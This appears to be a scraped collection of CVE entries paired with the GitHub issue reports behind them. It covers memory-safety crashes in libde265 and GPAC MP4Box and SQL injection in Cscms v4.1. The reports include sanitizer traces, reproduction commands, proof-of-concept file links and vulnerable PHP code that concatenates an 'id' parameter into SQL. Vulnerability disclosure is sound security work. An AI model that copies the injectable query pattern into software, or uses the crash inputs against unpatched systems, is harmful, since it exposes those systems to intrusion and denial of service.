0x7ff9ff8a4ace in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4645 #9 0x7ff9ff8a4db9 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4641 #10 0x7ff9ff8a6564 in decode_substream(thread_context*, bool, bool) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4741 #11 0x7ff9ff8a8ddb in read_slice_segment_data(thread_context*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:5054 #12 0x7ff9ff78dd75 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:843 #13 0x7ff9ff790c0f in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:945 #14 0x7ff9ff791715 in decoder_context::decode_some(bool*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:730 #15 0x7ff9ff7949bb in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:688 #16 0x7ff9ff795839 in decoder_context::decode_NAL(NAL_unit*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:1230 #17 0x7ff9ff796e1e in decoder_context::decode(int*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:1318 #18 0x5573510028fd in main /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/dec265/dec265.cc:764 #19 0x7ff9ff2e50b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #20 0x55735100576d in _start (/home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/out/dec265-afl+++0xa76d) Address 0x7ffeacbd65e3 is located in stack of thread T0 at offset 9315 in frame #0 0x7ff9ff82e67f in void mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/motion.cc:174 This frame has 2 object(s): [32, 9120) 'mcbuffer' (line 200) [9392, 14752) 'padbuf' (line 222) <== Memory access at offset 9315 underflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/fallback-motion.cc:352 in void put_epel_hv_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, int, int, short*, int) Shadow bytes around the buggy address: 0x100055972c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100055972c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100055972c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100055972c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100055972ca0: 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 =>0x100055972cb0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2[f2]f2 f2 f2 0x100055972cc0: f2 f2 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 0x100055972cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100055972ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100055972cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100055972d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1262407==ABORTING ```

stack-buffer-overflow in fallback-motion.cc when decoding file

https://api.github.com/repos/strukturag/libde265/issues/301/comments

2021-06-24T14:47:49Z

2023-01-27T12:18:10Z

https://github.com/strukturag/libde265/issues/301

CVE-2021-36411

2022-01-10T23:15:09.133

An issue has been found in libde265 v1.0.8 due to incorrect access control. A SEGV caused by a READ memory access in function derive_boundaryStrength of deblock.cc has occurred. The vulnerability causes a segmentation fault and application crash, which leads to remote denial of service.

https://github.com/strukturag/libde265/issues/302

github.com

Hello, A SEGV of deblock.cc in function derive_boundaryStrength has occurred when running program dec265， source code ``` 283 if ((edgeFlags & transformEdgeMask) && 284 (img->get_nonzero_coefficient(xDi ,yDi) || 285 img->get_nonzero_coefficient(xDiOpp,yDiOpp))) { 286 bS = 1; 287 } 288 else { 289 290 bS = 0; 291 292 const PBMotion& mviP = img->get_mv_info(xDiOpp,yDiOpp); 293 const PBMotion& mviQ = img->get_mv_info(xDi ,yDi); 294 295 slice_segment_header* shdrP = img->get_SliceHeader(xDiOpp,yDiOpp); 296 slice_segment_header* shdrQ = img->get_SliceHeader(xDi ,yDi); 297 298 int refPicP0 = mviP.predFlag[0] ? shdrP->RefPicList[0][ mviP.refIdx[0] ] : -1; 299 int refPicP1 = mviP.predFlag[1] ? shdrP->RefPicList[1][ mviP.refIdx[1] ] : -1; 300 int refPicQ0 = mviQ.predFlag[0] ? shdrQ->RefPicList[0][ mviQ.refIdx[0] ] : -1; 301 int refPicQ1 = mviQ.predFlag[1] ? shdrQ->RefPicList[1][ mviQ.refIdx[1] ] : -1; 302 303 bool samePics = ((refPicP0==refPicQ0 && refPicP1==refPicQ1) || 304 (refPicP0==refPicQ1 && refPicP1==refPicQ0)); ``` **Due to incorrect access control, a SEGV caused by a READ memory access occurred at line 298 of the code. This issue can cause a Denial of Service attack.** System info： Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 Dec265 v1.0.8 [poc.zip](https://github.com/strukturag/libde265/files/6716779/poc.zip) Verification steps： 1.Get the source code of libde265 2.Compile ``` cd libde265 mkdir build && cd build cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address" make -j 32 ``` 3.run dec265(without asan) ``` ./dec265 poc ``` Output ``` WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: CTB outside of image area (concealing stream error...) WARNING: CTB outside of image area (concealing stream error...) Segmentation fault(core dumped) ``` AddressSanitizer output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==3532158==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000003d0 (pc 0x7f19b4f52978 bp 0x616000001580 sp 0x7fff00e87c20 T0) ==3532158==The signal is caused by a READ memory access. ==3532158==Hint: address points to the zero page. #0 0x7f19b4f52977 in derive_boundaryStrength(de265_image*, bool, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/deblock.cc:298 #1 0x7f19b4f56835 in apply_deblocking_filter(de265_image*) /home/dh/sda3/libde265-master/libde265-master/libde265/deblock.cc:1046 #2 0x7f19b4f7e626 in decoder_context::run_postprocessing_filters_sequential(de265_image*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:1880 #3 0x7f19b4f9baa0 in decoder_context::decode_some(bool*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:769 #4 0x7f19b4f9f95e in decoder_context::decode(int*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:1329 #5 0x55704ed8c8fd in main /home/dh/sda3/libde265-master/libde265-master/dec265/dec265.cc:764 #6 0x7f19b4aee0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #7 0x55704ed8f76d in _start (/home/dh/sda3/libde265-master/libde265-master/dec265+0xa76d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/dh/sda3/libde265-master/libde265-master/libde265/deblock.cc:298 in derive_boundaryStrength(de265_image*, bool, int, int, int, int) ==3532158==ABORTING ``` gdb info ``` [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: non-existing reference picture accessed WARNING: non-existing reference picture accessed WARNING: non-existing reference picture accessed WARNING: non-existing reference picture accessed WARNING: non-existing reference picture accessed WARNING: non-existing reference picture accessed WARNING: CTB outside of image area (concealing stream error...) WARNING: CTB outside of image area (concealing stream error...) Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x2 RCX: 0x61b000001580 --> 0xbebebebe00000000 RDX: 0x0 RSI: 0x7a ('z') RDI: 0x3d0 RBP: 0x616000001580 --> 0xbebebebe00000007 RSP: 0x7fffffff36e0 --> 0x3000000000 --> 0x0 RIP: 0x7ffff724b978 (<derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6024>: mov ebx,DWORD PTR [r9+r15*4+0x3b8]) R8 : 0x3 R9 : 0x0 R10: 0x6330000d6800 --> 0x8ffff00000101 R11: 0x6330000d6200 --> 0x60101 R12: 0x0 R13: 0xffffffffffffff90 R14: 0x7ffff31ff800 --> 0xbebebebebebebebe R15: 0x6 EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff724b96e <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6014>: jl 0x7ffff724b978 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6024> 0x7ffff724b970 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6016>: test dl,dl 0x7ffff724b972 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6018>: jne 0x7ffff724dd87 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+15255> => 0x7ffff724b978 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6024>: mov ebx,DWORD PTR [r9+r15*4+0x3b8] 0x7ffff724b980 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6032>: mov edx,0x376d 0x7ffff724b985 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6037>: mov eax,0xafce 0x7ffff724b98a <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6042>: lea r15,[r11+0x1] 0x7ffff724b98e <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6046>: mov rdi,r15 [------------------------------------stack-------------------------------------] 0000| 0x7fffffff36e0 --> 0x3000000000 --> 0x0 0008| 0x7fffffff36e8 --> 0x6160000016f8 --> 0x4000000080 --> 0x0 0016| 0x7fffffff36f0 --> 0x6160000016e8 --> 0x625000057900 --> 0x0 0024| 0x7fffffff36f8 --> 0xa000000080 --> 0x0 0032| 0x7fffffff3700 --> 0x1 0040| 0x7fffffff3708 --> 0xbf000000c0 --> 0x0 0048| 0x7fffffff3710 --> 0x61600000167c --> 0x4000000003 --> 0x0 0056| 0x7fffffff3718 --> 0xff00f800 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ffff724b978 in derive_boundaryStrength (img=img@entry=0x616000001580, vertical=vertical@entry=0x0, yStart=yStart@entry=0x0, yEnd=<optimized out>, xStart=xStart@entry=0x0, xEnd=<optimized out>) at /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/deblock.cc:298 298 int refPicP0 = mviP.predFlag[0] ? shdrP->RefPicList[0][ mviP.refIdx[0] ] : -1; ```

A SEGV has occurred when running program dec265

https://api.github.com/repos/strukturag/libde265/issues/302/comments

2021-06-25T14:41:05Z

2023-01-27T12:50:07Z

https://github.com/strukturag/libde265/issues/302

CVE-2021-36412

2022-01-10T23:15:09.177

A heap-based buffer overflow vulnerability exists in MP4Box in GPAC 1.0.1 via the gp_rtp_builder_do_mpeg12_video function, which allows attackers to possibly have unspecified other impact via a crafted file in the MP4Box command,

https://github.com/gpac/gpac/issues/1838

github.com

Hello, A heap-buffer-overflow has occurred when running program MP4Box,this can reproduce on the lattest commit. System info： Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 [poc1.zip](https://github.com/gpac/gpac/files/6757801/poc1.zip) Verification steps： 1.Get the source code of gpac 2.Compile ``` cd gpac-master CC=gcc CXX=g++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" ./configure make ``` 3.run MP4Box ``` ./MP4Box -hint poc -out /dev/null ``` asan info ``` ================================================================= ==2631249==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001bd4 at pc 0x7f2ac7fe5b9b bp 0x7ffc4389ba70 sp 0x7ffc4389ba60 READ of size 1 at 0x602000001bd4 thread T0 #0 0x7f2ac7fe5b9a in gp_rtp_builder_do_mpeg12_video ietf/rtp_pck_mpeg12.c:156 #1 0x7f2ac889948a in gf_hinter_track_process media_tools/isom_hinter.c:808 #2 0x559f0eb8ae2b in HintFile /home/.../gpac/gpac-master/applications/mp4box/main.c:3499 #3 0x559f0eba1d54 in mp4boxMain /home/.../gpac/gpac-master/applications/mp4box/main.c:6297 #4 0x7f2ac74d10b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #5 0x559f0eb54f1d in _start (/home/.../gpac/gpac-master/bin/gcc/MP4Boxfl+0x48f1d) 0x602000001bd4 is located 0 bytes to the right of 4-byte region [0x602000001bd0,0x602000001bd4) allocated by thread T0 here: #0 0x7f2aca3afbc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8) #1 0x7f2ac83d56cd in Media_GetSample isomedia/media.c:617 SUMMARY: AddressSanitizer: heap-buffer-overflow ietf/rtp_pck_mpeg12.c:156 in gp_rtp_builder_do_mpeg12_video Shadow bytes around the buggy address: 0x0c047fff8320: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff8330: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff8340: fa fa fd fd fa fa fd fd fa fa fd fa fa fa 00 00 0x0c047fff8350: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8360: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 =>0x0c047fff8370: fa fa 00 00 fa fa 00 00 fa fa[04]fa fa fa fa fa 0x0c047fff8380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2631249==ABORTING ``` source code of rtp_pck_mpeg12.c ``` 143 max_pck_size = builder->Path_MTU - 4; 144 145 payload = data + offset; 146 pic_type = (payload[1] >> 3) & 0x7; 147 /*first 6 bits (MBZ and T bit) not used*/ 148 /*temp ref on 10 bits*/ 149 mpv_hdr[0] = (payload[0] >> 6) & 0x3; 150 mpv_hdr[1] = (payload[0] << 2) | ((payload[1] >> 6) & 0x3); 151 mpv_hdr[2] = pic_type; 152 mpv_hdr[3] = 0; 153 154 if ((pic_type==2) || (pic_type== 3)) { 155 mpv_hdr[3] = (u8) ((((u32)payload[3]) << 5) & 0xf); 156 if ((payload[4] & 0x80) != 0) mpv_hdr[3] |= 0x10; 157 if (pic_type == 3) mpv_hdr[3] |= (payload[4] >> 3) & 0xf; 158 } ```

A heap-buffer-overflow in function gp_rtp_builder_do_mpeg12_video

https://api.github.com/repos/gpac/gpac/issues/1838/comments

2021-07-03T03:57:55Z

2021-07-05T14:50:12Z

https://github.com/gpac/gpac/issues/1838

CVE-2021-36414

2022-01-10T23:15:09.223

A heab-based buffer overflow vulnerability exists in MP4Box in GPAC 1.0.1 via media.c, which allows attackers to cause a denial of service or execute arbitrary code via a crafted file.

https://github.com/gpac/gpac/issues/1840

github.com

Hello, A heap-buffer-overflow has occurred when running program MP4Box,which leads to a Deny of Service caused by dividing zero without sanity check,this can reproduce on the lattest commit. System info： Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 [poc.zip](https://github.com/gpac/gpac/files/6763051/poc.zip) file: media.c function:gf_isom_get_3gpp_audio_esd line: 105 As below code shows: ``` 97 gf_bs_write_data(bs, "\x41\x6D\x7F\x5E\x15\xB1\xD0\x11\xBA\x91\x00\x80\x5F\xB4\xB9\x7E", 16); 98 gf_bs_write_u16_le(bs, 1); 99 memset(szName, 0, 80); 100 strcpy(szName, "QCELP-13K(GPAC-emulated)"); 101 gf_bs_write_data(bs, szName, 80); 102 ent = &stbl->TimeToSample->entries[0]; 103 sample_rate = entry->samplerate_hi; 104 block_size = ent ? ent->sampleDelta : 160; 105 gf_bs_write_u16_le(bs, 8*sample_size*sample_rate/block_size); <------ block_size can be zero 106 gf_bs_write_u16_le(bs, sample_size); 107 gf_bs_write_u16_le(bs, block_size); 108 gf_bs_write_u16_le(bs, sample_rate); 109 gf_bs_write_u16_le(bs, entry->bitspersample); 110 gf_bs_write_u32_le(bs, sample_size ? 0 : 7); ``` Verification steps： 1.Get the source code of gpac 2.Compile ``` cd gpac-master CC=gcc CXX=g++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" ./configure make ``` 3.run MP4Box ``` ./MP4Box -hint poc -out /dev/null ``` In Command line: ``` [iso file] Unknown box type esJs in parent enca [iso file] Unknown box type stts in parent enca [iso file] Box "enca" (start 1455) has 5 extra bytes [iso file] Box "enca" is larger than container box [iso file] Box "stsd" size 171 (start 1439) invalid (read 192) Floating point exception ``` gdb info  asan info ``` ================================================================= ==967870==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001874 at pc 0x7f3a53c0836c bp 0x7ffcce36e790 sp 0x7ffcce36e780 READ of size 4 at 0x602000001874 thread T0 #0 0x7f3a53c0836b in gf_isom_get_3gpp_audio_esd isomedia/media.c:104 #1 0x7f3a53c0836b in Media_GetESD isomedia/media.c:330 #2 0x7f3a53b1ac04 in gf_isom_get_decoder_config isomedia/isom_read.c:1329 #3 0x7f3a53b56d2e in gf_isom_guess_specification isomedia/isom_read.c:4035 #4 0x5602827ad1d1 in HintFile /home/.../gpac/gpac-master-A/applications/mp4box/main.c:3379 #5 0x5602827c4d54 in mp4boxMain /home/.../gpac/gpac-master-A/applications/mp4box/main.c:6297 #6 0x7f3a52d080b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #7 0x560282777f1d in _start (/home/.../gpac/gpac-master-A/bin/gcc/MP4Box+0x48f1d) 0x602000001874 is located 3 bytes to the right of 1-byte region [0x602000001870,0x602000001871) allocated by thread T0 here: #0 0x7f3a55be6bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8) #1 0x7f3a539e10ec in stts_box_read isomedia/box_code_base.c:5788 SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/media.c:104 in gf_isom_get_3gpp_audio_esd Shadow bytes around the buggy address: 0x0c047fff82b0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff82c0: fa fa fd fd fa fa fd fd fa fa fd fa fa fa 00 00 0x0c047fff82d0: fa fa 01 fa fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff82e0: fa fa 00 00 fa fa 01 fa fa fa 00 00 fa fa 00 00 0x0c047fff82f0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 =>0x0c047fff8300: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa[01]fa 0x0c047fff8310: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa 0x0c047fff8320: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8330: fa fa 01 fa fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8340: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff8350: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==967870==ABORTING ```

heap buffer overflow issue with gpac MP4Box

https://api.github.com/repos/gpac/gpac/issues/1840/comments

2021-07-05T12:32:43Z

2021-07-05T14:50:12Z

https://github.com/gpac/gpac/issues/1840

CVE-2020-28102

2022-01-11T16:15:07.703

cscms v4.1 allows for SQL injection via the "js_del" function.

https://github.com/chshcms/cscms/issues/9

github.com

## 1.Vulnerability summary Vulnerability name：Cscms V4.1 has sqlinjection vulnerabilities Report date: 2020-10-26 Product Home: http://www.chshcms.com/down.html Software link:http://www.chshcms.com/down.html Version:v4.1 ## 2.Vulnerability overview Vulnerability file:cscms4.1\plugins\sys\admin\label.php 197 lines-219 lines Vulnerability function：js_del Vulnerability param:id public function js_del(){ $id = $this->input->get_post('id'); if(empty($id)) getjson(L('plub_04')); //删除文件 if(is_array($id)){ foreach ($id as $ids) { $row=$this->db->query("SELECT js FROM ".CS_SqlPrefix."ads where id='".$ids."'")->row(); if($row){ $jsurl='.'.Web_Path.'attachment/js/'.$row->js.'.js'; @unlink($jsurl); } } }else{ $row=$this->db->query("SELECT js FROM ".CS_SqlPrefix."ads where id='".$id."'")->row(); if($row){ $jsurl='.'.Web_Path.'attachment/js/'.$row->js.'.js'; @unlink($jsurl); } } $this->Csdb->get_del('ads',$id); $info['url'] = site_url('label/js').'?v='.rand(1000,9999); getjson($info,0); } ### 3.vulnerability exploitation sql injection type：timebased-sqlinjection wrong answer:  right answer: 

Cscms V4.1 has sqlinjection vulnerability(2)

https://api.github.com/repos/chshcms/cscms/issues/9/comments

2020-10-26T07:13:46Z

2020-10-26T07:13:46Z

https://github.com/chshcms/cscms/issues/9

CVE-2020-28103

2022-01-11T16:15:07.757

cscms v4.1 allows for SQL injection via the "page_del" function.

https://github.com/chshcms/cscms/issues/8

github.com

## 1.Vulnerability summary Vulnerability name：Cscms V4.1 has sqlinjection vulnerabilities Report date: 2020-10-26 Product Home: http://www.chshcms.com/down.html Software link:http://www.chshcms.com/down.html Version:v4.1 ## 2.Vulnerability overview Vulnerability file:cscms4.1\plugins\sys\admin\label.php 332 lines-356 lines Vulnerability function：page_del Vulnerability param:id public function page_del(){ $id = $this->input->get_post('id'); if(empty($id)) getjson(L('plub_04'));//参数错误 //删除文件 if(is_array($id)){ foreach ($id as $ids) { $row=$this->db->query("SELECT sid,url FROM ".CS_SqlPrefix."page where id='".$ids."'")->row(); if($row && $row->sid==1){ $html='.'.$row->url; @unlink($html); } } }else{ $row=$this->db->query("SELECT sid,url FROM ".CS_SqlPrefix."page where id='".$id."'")->row(); if($row && $row->sid==1){ $html='.'.$row->url; @unlink($html); } } $this->Csdb->get_del('page',$id); $info['url'] = site_url('label/page').'?v='.rand(1000,9999); getjson($info,0); } ### 3.vulnerability exploitation sql injection type：timebased-sqlinjection wrong answer:  right answer: 

Cscms V4.1 has sqlinjection vulnerability(1)

https://api.github.com/repos/chshcms/cscms/issues/8/comments

2020-10-26T07:07:29Z

2020-10-26T07:14:41Z

https://github.com/chshcms/cscms/issues/8

CVE-2021-36417

2022-01-12T19:15:08.207

A heap-based buffer overflow vulnerability exists in GPAC v1.0.1 in the gf_isom_dovi_config_get function in MP4Box, which causes a denial of service or execute arbitrary code via a crafted file.

https://github.com/gpac/gpac/issues/1846

github.com

Hello, A heap-buffer-overflow has occurred in function gf_isom_dovi_config_get of isomedia/avc_ext.c:2435 when running program MP4Box,this can reproduce on the lattest commit. System info： Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 [poc_heap.zip](https://github.com/gpac/gpac/files/6773968/poc_heap.zip) Verification steps： 1.Get the source code of gpac 2.Compile ``` cd gpac-master CC=gcc CXX=g++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" ./configure make ``` 3.run MP4Box ``` ./MP4Box -info poc.mp4 ``` command line ``` [iso file] Unknown box type esJs in parent enca [iso file] Unknown box type stts in parent enca [iso file] Box "enca" (start 1455) has 5 extra bytes [iso file] Box "enca" is larger than container box [iso file] Box "stsd" size 171 (start 1439) invalid (read 192) * Movie Info * Timescale 90000 - 2 tracks Segmentation fault ``` asan info ``` ================================================================= ==1042542==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x610000000130 at pc 0x7fc6ede92514 bp 0x7ffcfced6850 sp 0x7ffcfced6840 READ of size 8 at 0x610000000130 thread T0 #0 0x7fc6ede92513 in gf_isom_dovi_config_get isomedia/avc_ext.c:2435 #1 0x7fc6ee2fec1e in gf_media_get_rfc_6381_codec_name media_tools/isom_tools.c:4207 #2 0x558b1bf03ac5 in DumpTrackInfo /home.../gpac/gpac-master/applications/mp4box/filedump.c:3442 #3 0x558b1bf18f44 in DumpMovieInfo /home.../gpac/gpac-master/applications/mp4box/filedump.c:3777 #4 0x558b1bed571d in mp4boxMain /home.../gpac/gpac-master/applications/mp4box/main.c:5991 #5 0x7fc6ed2390b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #6 0x558b1be77f1d in _start (/home.../gpac/gpac-master/bin/gcc/MP4Boxfl+0x48f1d) Address 0x610000000130 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/avc_ext.c:2435 in gf_isom_dovi_config_get Shadow bytes around the buggy address: 0x0c207fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c207fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c207fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c207fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c207fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c207fff8020: fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa 0x0c207fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1042542==ABORTING ``` source code ``` 2428 GF_DOVIDecoderConfigurationRecord *gf_isom_dovi_config_get(GF_ISOFile* the_file, u32 trackNumber, u32 DescriptionIndex) 2429 { 2430 GF_TrackBox* trak; 2431 GF_MPEGVisualSampleEntryBox *entry; 2432 trak = gf_isom_get_track_from_file(the_file, trackNumber); 2433 if (!trak || !trak->Media || !DescriptionIndex) return NULL; 2434 entry = (GF_MPEGVisualSampleEntryBox*)gf_list_get(trak->Media->information->sampleTable->SampleDescription->child_boxes, DescriptionIndex - 1); 2435 if (!entry || !entry->dovi_config) return NULL; 2436 return DOVI_DuplicateConfig(&entry->dovi_config->DOVIConfig); 2437 } ```

A heap-buffer-overflow has occurred in function gf_isom_dovi_config_get

https://api.github.com/repos/gpac/gpac/issues/1846/comments

2021-07-07T03:09:17Z

2021-07-07T13:51:03Z

https://github.com/gpac/gpac/issues/1846

CVE-2021-40559

2022-01-12T21:15:07.573

A null pointer deference vulnerability exists in gpac through 1.0.1 via the naludmx_parse_nal_avc function in reframe_nalu, which allows a denail of service.

https://github.com/gpac/gpac/issues/1886

github.com

- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Hi, there. There is a segmentation fault caused by null pointer dereference in naludmx_parse_nal_avc, reframe_nalu.c:2474 in commit 592ba2689a3. Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 